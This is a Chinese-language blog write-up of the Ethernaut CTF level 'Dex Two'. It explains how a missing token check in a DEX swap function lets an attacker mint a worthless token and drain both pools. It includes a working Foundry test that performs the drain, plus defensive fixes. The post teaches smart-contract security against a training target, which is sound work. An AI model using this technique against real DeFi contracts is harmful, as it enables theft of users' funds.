<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">

    
      <link rel="icon" href="/favicon.png" />
    

    <title>
        
          Ethernaut Level 23: Dex Two - 任意代币对价格操纵 - Kent&#39;s Blog
        
    </title>

    <!-- Spectre.css framework -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/spectre.css/0.5.9/spectre.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/spectre.css/0.5.9/spectre-exp.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/spectre.css/0.5.9/spectre-icons.min.css">

    <!-- theme css & js -->
    
<link rel="stylesheet" href="/css/book.css">

    
<script src="/js/book.js"></script>


    <!-- tocbot -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.css">
    
    <!-- katex -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.10.0/katex.min.css">

    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/zooming/2.1.1/zooming.min.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    const zooming = new Zooming()
    zooming.listen('.book-content img')
})
</script>

<meta name="generator" content="Hexo 7.3.0"></head>

<body>

<div class="book-container">
  <div class="book-sidebar">
    <div class="book-brand">
  <a href="/">
    <img src="/favicon.png">
    <span>KENT&#39;S BLOG</span>
  </a>
</div>
    <div id="menu" class="book-menu hide">
  <h2 id="主要内容"><a href="#主要内容" class="headerlink" title="主要内容"></a>主要内容</h2><ul>
<li><a href="/">首页</a></li>
<li><a href="/archives">文章归档</a></li>
<li><a href="/categories">分类浏览</a> </li>
<li><a href="/tags">标签云</a></li>
</ul>
<h2 id="Web3-0-专区"><a href="#Web3-0-专区" class="headerlink" title="Web3.0 专区"></a>Web3.0 专区</h2><ul>
<li><a href="/categories/Dapp">Dapp 开发</a></li>
<li><a href="/tags/solidity">智能合约</a></li>
<li><a href="/tags/blockchain">区块链技术</a></li>
<li><a href="/categories/Web3%E5%AE%89%E5%85%A8">Web3安全</a></li>
</ul>
<h2 id="Ethernaut-系列-🛡️"><a href="#Ethernaut-系列-🛡️" class="headerlink" title="Ethernaut 系列 🛡️"></a>Ethernaut 系列 🛡️</h2><ul>
<li><a href="/2025/01/25/ethernaut-foundry-solutions-series/">系列总览</a></li>
<li><a href="/2025/01/25/foundry-setup-guide/">Foundry 环境搭建</a></li>
</ul>
<h3 id="基础攻击篇-1-10"><a href="#基础攻击篇-1-10" class="headerlink" title="基础攻击篇 (1-10)"></a>基础攻击篇 (1-10)</h3><ul>
<li><a href="/2025/01/25/ethernaut-level-01-fallback/">Level 1: Fallback</a></li>
<li><a href="/2025/01/25/ethernaut-level-02-fallout/">Level 2: Fallout</a></li>
<li><a href="/2025/01/25/ethernaut-level-03-coinflip/">Level 3: Coin Flip</a></li>
<li><a href="/2025/01/25/ethernaut-level-04-telephone/">Level 4: Telephone</a></li>
<li><a href="/2025/01/25/ethernaut-level-05-token/">Level 5: Token</a></li>
<li><a href="/2025/01/25/ethernaut-level-06-delegation/">Level 6: Delegation</a></li>
<li><a href="/2025/01/25/ethernaut-level-07-force/">Level 7: Force</a></li>
<li><a href="/2025/01/25/ethernaut-level-08-vault/">Level 8: Vault</a></li>
<li><a href="/2025/01/25/ethernaut-level-09-king/">Level 9: King</a></li>
<li><a href="/2025/01/25/ethernaut-level-10-reentrancy/">Level 10: Re-entrancy</a></li>
</ul>
<h3 id="进阶攻击篇-11-20"><a href="#进阶攻击篇-11-20" class="headerlink" title="进阶攻击篇 (11-20)"></a>进阶攻击篇 (11-20)</h3><ul>
<li><a href="/2025/01/25/ethernaut-level-11-elevator/">Level 11: Elevator</a></li>
<li><a href="/2025/01/25/ethernaut-level-12-privacy/">Level 12: Privacy</a></li>
<li><a href="/2025/01/25/ethernaut-level-13-gatekeeper-one/">Level 13: Gatekeeper One</a></li>
<li><a href="/2025/01/25/ethernaut-level-14-gatekeeper-two/">Level 14: Gatekeeper Two</a></li>
<li><a href="/2025/01/25/ethernaut-level-15-naught-coin/">Level 15: Naught Coin</a></li>
<li><a href="/2025/01/25/ethernaut-level-16-preservation/">Level 16: Preservation</a></li>
<li><a href="/2025/01/25/ethernaut-level-17-recovery/">Level 17: Recovery</a></li>
<li><a href="/2025/01/25/ethernaut-level-18-magic-number/">Level 18: Magic Number</a></li>
<li><a href="/2025/01/25/ethernaut-level-19-alien-codex/">Level 19: Alien Codex</a></li>
<li><a href="/2025/01/25/ethernaut-level-20-denial/">Level 20: Denial</a></li>
</ul>
<h3 id="高级攻击篇-21-25"><a href="#高级攻击篇-21-25" class="headerlink" title="高级攻击篇 (21-25)"></a>高级攻击篇 (21-25)</h3><ul>
<li><a href="/2025/01/25/ethernaut-level-21-shop/">Level 21: Shop</a></li>
<li><a href="/2025/01/25/ethernaut-level-22-dex/">Level 22: Dex</a></li>
<li><a href="/2025/01/25/ethernaut-level-23-dex-two/">Level 23: Dex Two</a></li>
<li><a href="/2025/01/25/ethernaut-level-24-puzzle-wallet/">Level 24: Puzzle Wallet</a></li>
<li><a href="/2025/01/25/ethernaut-level-25-motorbike/">Level 25: Motorbike</a></li>
</ul>
<h2 id="个人页面"><a href="#个人页面" class="headerlink" title="个人页面"></a>个人页面</h2><ul>
<li><a href="/about">关于我</a></li>
<li><a href="/repository">项目展示</a></li>
<li><a href="/books">书单推荐</a></li>
<li><a href="/links">友情链接</a></li>
</ul>

</div>


<script src="/js/book-menu.js"></script>

  </div>

  <div class="sidebar-toggle" onclick="sidebar_toggle()" onmouseover="add_inner()" onmouseleave="remove_inner()">
  <div class="sidebar-toggle-inner"></div>
</div>

<script>
function add_inner() {
  let inner = document.querySelector('.sidebar-toggle-inner')
  inner.classList.add('show')  
}

function remove_inner() {
  let inner = document.querySelector('.sidebar-toggle-inner')
  inner.classList.remove('show')
}

function sidebar_toggle() {
    let sidebar_toggle = document.querySelector('.sidebar-toggle')
    let sidebar = document.querySelector('.book-sidebar')
    let content = document.querySelector('.off-canvas-content')
    if (sidebar_toggle.classList.contains('extend')) { // show
        sidebar_toggle.classList.remove('extend')
        sidebar.classList.remove('hide')
        content.classList.remove('extend')
    }
    else { // hide
        sidebar_toggle.classList.add('extend')
        sidebar.classList.add('hide')
        content.classList.add('extend')
    }
}
</script>

  <div class="off-canvas-content">
    <div class="columns">
      <div class="column col-10 col-lg-12">
        <div class="book-navbar">
          <!-- For Responsive Layout -->

<header class="navbar">
  <section class="navbar-section">
    <a onclick="open_sidebar()">
      <i class="icon icon-menu"></i>
    </a>
  </section>
</header>

        </div>
        <div class="book-content">
          <div class="book-post">
  <h1 id="🎯-Ethernaut-Level-23-Dex-Two-任意代币对价格操纵"><a href="#🎯-Ethernaut-Level-23-Dex-Two-任意代币对价格操纵" class="headerlink" title="🎯 Ethernaut Level 23: Dex Two - 任意代币对价格操纵"></a>🎯 Ethernaut Level 23: Dex Two - 任意代币对价格操纵</h1><blockquote>
<p><strong>关卡链接</strong>: <a target="_blank" rel="noopener" href="https://ethernaut.openzeppelin.com/level/23">Ethernaut Level 23 - Dex Two</a><br><strong>攻击类型</strong>: 价格操纵 &#x2F; 缺少输入验证<br><strong>难度</strong>: ⭐⭐⭐☆☆</p>
</blockquote>
<h2 id="📋-挑战目标"><a href="#📋-挑战目标" class="headerlink" title="📋 挑战目标"></a>📋 挑战目标</h2><p>与上一关类似，你需要与一个 <code>Dex</code> 合约交互。但这次的目标更具挑战性：你需要同时耗尽 <code>Dex</code> 合约中 <code>Token1</code> <strong>和</strong> <code>Token2</code> 的全部流动性。</p>
<ul>
<li><strong>初始状态</strong>: <ul>
<li>Player: 10 TKN1, 10 TKN2</li>
<li>Dex: 100 TKN1, 100 TKN2</li>
</ul>
</li>
</ul>
<p><img src="https://ethernaut.openzeppelin.com/imgs/BigLevel23.svg" alt="Dex Two Requirements"></p>
<h2 id="🔍-漏洞分析"><a href="#🔍-漏洞分析" class="headerlink" title="🔍 漏洞分析"></a>🔍 漏洞分析</h2><p><code>DexTwo</code> 合约的代码与上一关的 <code>Dex</code> 几乎完全相同，但有一个微小却致命的改动。在 <code>swap</code> 函数中，一行关键的验证代码被移除了：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// This line was present in Dex, but is missing in DexTwo</span><br><span class="line">// require((from == token1 &amp;&amp; to == token2) || (from == token2 &amp;&amp; to == token1), &quot;Invalid tokens&quot;);</span><br></pre></td></tr></table></figure>

<p>这行代码原本用于确保交易只在 <code>token1</code> 和 <code>token2</code> 之间进行。由于它被移除了，<code>DexTwo</code> 的 <code>swap</code> 函数现在可以接受<strong>任何</strong>符合ERC20标准的代币作为交易对的一方。</p>
<p>这就为我们打开了攻击的大门。我们可以创建一个我们自己控制的、毫无价值的“攻击代币”（我们称之为 <code>Token3</code>），并用它来操纵与 <code>Token1</code> 和 <code>Token2</code> 的交易价格。</p>
<h3 id="攻击流程"><a href="#攻击流程" class="headerlink" title="攻击流程"></a>攻击流程</h3><p>我们的策略是利用我们自己创建的 <code>Token3</code> 作为媒介，以极低的价格换取 <code>Dex</code> 池中所有的 <code>Token1</code> 和 <code>Token2</code>。</p>
<ol>
<li><p><strong>创建并分发攻击代币</strong>: 我们创建一个新的ERC20代币 <code>Token3</code>，并给自己铸造大量的 <code>Token3</code>。</p>
</li>
<li><p><strong>为 <code>Token3</code> 提供“流动性”</strong>: 我们向 <code>DexTwo</code> 合约发送极少量的 <code>Token3</code>（例如，1个）。现在 <code>DexTwo</code> 合约中 <code>Token3</code> 的余额为1。</p>
</li>
<li><p><strong>第一次交换 (Token3 -&gt; Token1)</strong>:</p>
<ul>
<li>我们现在用 <code>Token3</code> 交换 <code>Token1</code>。池中 <code>Token1</code> 的余额是100，<code>Token3</code> 的余额是1。价格比为 100:1。</li>
<li>我们只需要发送1个 <code>Token3</code>，就可以根据价格公式换取 <code>(1 * 100) / 1 = 100</code> 个 <code>Token1</code>。</li>
<li>交换后，<code>Dex</code> 池中的 <code>Token1</code> 被全部换走。</li>
</ul>
</li>
<li><p><strong>第二次交换 (Token3 -&gt; Token2)</strong>:</p>
<ul>
<li>现在池中 <code>Token2</code> 的余额是100，<code>Token3</code> 的余额是2（我们第一次交换时转入了1个，现在又转入了1个）。价格比为 100:2，即 50:1。</li>
<li>我们发送2个 <code>Token3</code>，就可以换取 <code>(2 * 100) / 2 = 100</code> 个 <code>Token2</code>。</li>
<li>交换后，<code>Dex</code> 池中的 <code>Token2</code> 也被全部换走。</li>
</ul>
</li>
</ol>
<p>通过引入一个我们完全控制的第三方代币，我们成功地操纵了价格，并用极小的代价（总共3个我们自己随意铸造的 <code>Token3</code>）清空了整个 <code>Dex</code> 池。</p>
<h2 id="💻-Foundry-实现"><a href="#💻-Foundry-实现" class="headerlink" title="💻 Foundry 实现"></a>💻 Foundry 实现</h2><h3 id="Foundry-测试代码"><a href="#Foundry-测试代码" class="headerlink" title="Foundry 测试代码"></a>Foundry 测试代码</h3><p>测试代码将模拟上述的攻击流程：创建新代币，并用它来耗尽 <code>DexTwo</code> 的流动性。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: Unlicense</span><br><span class="line">pragma solidity ^0.8.0;</span><br><span class="line"></span><br><span class="line">import &quot;forge-std/Test.sol&quot;;</span><br><span class="line">import &quot;src/23_DexTwo.sol&quot;;</span><br><span class="line"></span><br><span class="line">contract DexTwoTest is Test &#123;</span><br><span class="line">    DexTwo instance;</span><br><span class="line">    address player;</span><br><span class="line">    SwappableTokenTwo token1;</span><br><span class="line">    SwappableTokenTwo token2;</span><br><span class="line"></span><br><span class="line">    function setUp() public &#123;</span><br><span class="line">        player = vm.addr(1);</span><br><span class="line">        instance = new DexTwo();</span><br><span class="line"></span><br><span class="line">        // 部署并设置初始代币</span><br><span class="line">        token1 = new SwappableTokenTwo(address(instance), &quot;Token 1&quot;, &quot;TKN1&quot;, 110);</span><br><span class="line">        token2 = new SwappableTokenTwo(address(instance), &quot;Token 2&quot;, &quot;TKN2&quot;, 110);</span><br><span class="line">        instance.setTokens(address(token1), address(token2));</span><br><span class="line"></span><br><span class="line">        // 添加流动性并发送初始代币给 player</span><br><span class="line">        token1.approve(address(instance), 100);</span><br><span class="line">        token2.approve(address(instance), 100);</span><br><span class="line">        instance.add_liquidity(address(token1), 100);</span><br><span class="line">        instance.add_liquidity(address(token2), 100);</span><br><span class="line">        token1.transfer(player, 10);</span><br><span class="line">        token2.transfer(player, 10);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function testDexTwoAttack() public &#123;</span><br><span class="line">        vm.startPrank(player);</span><br><span class="line"></span><br><span class="line">        // 1. 部署我们自己的恶意代币</span><br><span class="line">        SwappableTokenTwo attackToken = new SwappableTokenTwo(address(instance), &quot;Attack Token&quot;, &quot;ATK&quot;, 400);</span><br><span class="line">        attackToken.approve(address(instance), type(uint256).max);</span><br><span class="line"></span><br><span class="line">        // 2. 向 Dex 提供极少量的恶意代币流动性</span><br><span class="line">        attackToken.transfer(address(instance), 1);</span><br><span class="line"></span><br><span class="line">        // 3. 用1个恶意代币换走所有 Token1</span><br><span class="line">        uint256 dexT1Balance = token1.balanceOf(address(instance));</span><br><span class="line">        uint256 swapAmount1 = instance.get_swap_price(address(attackToken), address(token1), 1);</span><br><span class="line">        assertEq(swapAmount1, dexT1Balance, &quot;Price should allow draining Token1&quot;);</span><br><span class="line">        instance.swap(address(attackToken), address(token1), 1);</span><br><span class="line"></span><br><span class="line">        // 4. 用2个恶意代币换走所有 Token2</span><br><span class="line">        uint256 dexT2Balance = token2.balanceOf(address(instance));</span><br><span class="line">        uint256 swapAmount2 = instance.get_swap_price(address(attackToken), address(token2), 2);</span><br><span class="line">        assertEq(swapAmount2, dexT2Balance, &quot;Price should allow draining Token2&quot;);</span><br><span class="line">        instance.swap(address(attackToken), address(token2), 2);</span><br><span class="line"></span><br><span class="line">        // 5. 验证 Dex 的两种代币都已被耗尽</span><br><span class="line">        bool drained = token1.balanceOf(address(instance)) == 0 &amp;&amp; token2.balanceOf(address(instance)) == 0;</span><br><span class="line">        assertTrue(drained, &quot;Dex should be drained of both tokens&quot;);</span><br><span class="line"></span><br><span class="line">        vm.stopPrank();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="关键攻击步骤"><a href="#关键攻击步骤" class="headerlink" title="关键攻击步骤"></a>关键攻击步骤</h3><ol>
<li><strong>识别漏洞</strong>: 发现 <code>swap</code> 函数缺少对交易代币的白名单验证。</li>
<li><strong>创建攻击代币</strong>: 部署一个我们自己控制的ERC20代币。</li>
<li><strong>注入虚假流动性</strong>: 向 <code>DexTwo</code> 合约发送极少量的攻击代币，以建立一个极不平衡的交易对。</li>
<li><strong>耗尽Token1</strong>: 用少量攻击代币交换 <code>DexTwo</code> 中所有的 <code>Token1</code>。</li>
<li><strong>耗尽Token2</strong>: 再次用少量攻击代币交换 <code>DexTwo</code> 中所有的 <code>Token2</code>。</li>
</ol>
<h2 id="🛡️-防御措施"><a href="#🛡️-防御措施" class="headerlink" title="🛡️ 防御措施"></a>🛡️ 防御措施</h2><ol>
<li><p><strong>严格的输入验证</strong>: 这是最关键的防御措施。合约必须严格验证所有外部输入，特别是那些决定核心逻辑的参数，如本例中的代币地址。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">// 修复建议：加回被移除的验证</span><br><span class="line">function swap(address from, address to, uint amount) public &#123;</span><br><span class="line">    require((from == token1 &amp;&amp; to == token2) || (from == token2 &amp;&amp; to == token1), &quot;Invalid tokens&quot;);</span><br><span class="line">    // ... a reste of the swap logic</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>使用白名单</strong>: 对于允许哪些代币参与交互的系统，应维护一个可信代币的白名单，并对所有传入的代币地址进行检查。</p>
</li>
</ol>
<h2 id="🔧-相关工具和技术"><a href="#🔧-相关工具和技术" class="headerlink" title="🔧 相关工具和技术"></a>🔧 相关工具和技术</h2><ul>
<li><strong>输入验证</strong>: 智能合约安全中最基本也是最重要的原则之一。永远不要相信来自外部的输入。</li>
<li><strong>代币白名单</strong>: 一种常见的安全模式，用于限制系统只与预先批准的、受信任的代币合约进行交互。</li>
</ul>
<h2 id="🎯-总结"><a href="#🎯-总结" class="headerlink" title="🎯 总结"></a>🎯 总结</h2><p><strong>核心概念</strong>:</p>
<ul>
<li>缺少对输入参数（如代币地址）的验证是一个严重的安全漏洞。</li>
<li>在去中心化交易所（DEX）中，如果允许任意代币参与交易，攻击者可以通过引入自己控制的代币来轻易地操纵价格。</li>
</ul>
<p><strong>攻击向量</strong>:</p>
<ul>
<li>创建一个新的、由攻击者完全控制的ERC20代币。</li>
<li>将这个新代币与目标代币在一个缺乏验证的DEX中形成交易对。</li>
<li>利用极不平衡的流动性比例，以极低的价格换取所有目标代幣。</li>
</ul>
<p><strong>防御策略</strong>:</p>
<ul>
<li>对所有函数的输入参数进行严格的白名单或有效性检查。</li>
<li>确保核心业务逻辑（如交易）只能在预期的、受信任的资产之间进行。</li>
</ul>
<h2 id="📚-参考资料"><a href="#📚-参考资料" class="headerlink" title="📚 参考资料"></a>📚 参考资料</h2><ul>
<li><a target="_blank" rel="noopener" href="https://swcregistry.io/docs/SWC-107">SWC-107: Unchecked External Call</a> (虽然本例是缺少验证，但根源都是对外部输入&#x2F;合约的不信任)</li>
<li><a target="_blank" rel="noopener" href="https://secureum.substack.com/p/security-pitfalls-and-best-practices-101">Secureum: Input Validation</a></li>
</ul>

</div>


  <div class="book-comments">
    




  </div>



<script src="/js/book-post.js"></script>

        </div>
      </div>
      <div class="column col-2 hide-lg">
        <div class="book-post-info">
  
    <div class="book-post-meta">

  <div class="author">

    <!-- Author image -->
    <div class="author-img">
      
        <figure
          class="avatar avatar-lg"
          data-initial="K"
          style="background-color: #3b4351;">
        </figure>
      
    </div>

    <!-- Author title -->
    <div class="author-title">
      <div>Kent</div>
      <div>2025-09-09</div>
    </div>
  </div>

  
    <div class="divider"></div>

    <div class="link">
      <a class="category-link" href="/categories/Ethernaut-%E7%B3%BB%E5%88%97/">Ethernaut 系列</a> <a class="category-link" href="/categories/Ethernaut-%E7%B3%BB%E5%88%97/%E9%AB%98%E7%BA%A7%E6%94%BB%E5%87%BB%E7%AF%87-21-25/">高级攻击篇 (21-25)</a>

      <a class="tag-none-link" href="/tags/DEX/" rel="tag">#DEX</a> <a class="tag-none-link" href="/tags/Ethernaut/" rel="tag">#Ethernaut</a> <a class="tag-none-link" href="/tags/Foundry/" rel="tag">#Foundry</a> <a class="tag-none-link" href="/tags/Price-Manipulation/" rel="tag">#Price Manipulation</a> <a class="tag-none-link" href="/tags/Token-Validation/" rel="tag">#Token Validation</a> <a class="tag-none-link" href="/tags/%E6%99%BA%E8%83%BD%E5%90%88%E7%BA%A6%E5%AE%89%E5%85%A8/" rel="tag">#智能合约安全</a>
    </div>
    
  

  <div class="divider"></div>
</div>
  

  <div class="book-tocbot">
</div>
<div class="book-tocbot-menu">
  <a class="book-toc-expand" onclick="expand_toc()">Expand all</a>
  <a onclick="go_top()">Back to top</a>
  <a onclick="go_bottom()">Go to bottom</a>
</div>


<script src="/js/book-toc.js"></script>

</div>
      </div>
    </div>
  </div>
  
  <a class="off-canvas-overlay" onclick="hide_canvas()"></a>
</div>

</body>
</html>


<script src="/js/book.js"></script>
